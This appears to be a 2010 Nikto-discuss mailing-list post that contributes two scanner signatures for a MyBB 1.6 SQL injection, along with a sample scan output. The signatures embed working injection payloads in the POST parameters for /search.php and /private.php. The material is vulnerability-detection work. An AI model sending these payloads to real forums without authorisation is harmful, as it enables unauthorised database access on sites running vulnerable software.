[Nikto-discuss] [db_tests] new entry - myBB SQL Injection
YGN Ethical Hacker Group
lists at yehg.net
Thu Dec 23 12:34:24 CST 2010
udb_tests
=========
"400000","0","9","/search.php","POST","MyBB has experienced an internal SQL
error and cannot continue.","","","Sorry, but no results were
returned","","MyBB 1.6 <= SQL Injection, ref:
http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection
","action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1",""
"400001","0","9","/private.php","POST","MyBB has experienced an internal SQL
error and cannot continue.","","","Sorry, but no results were
returned","","MyBBx 1.6 <= SQL Injection, ref:
http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection
","my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff",""
Testing
========
>perl nikto.pl -h http://attacker.in -root /mybb -useproxy
+ Target Port: 80
+ Proxy: localhost:8080
+ Start Time: 2010-12-25 02:28:34
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
DAV/2
+ /search.php: MyBB 1.6 <= SQL Injection, ref:
http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection
+ 2 items checked: 0 error(s) and 1 item(s) reported on remote host
+ End Time: 2010-12-25 02:28:52 (18 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://attrition.org/pipermail/nikto-discuss/attachments/20101224/48dd683a/attachment-0001.html>
More information about the Nikto-discuss
mailing list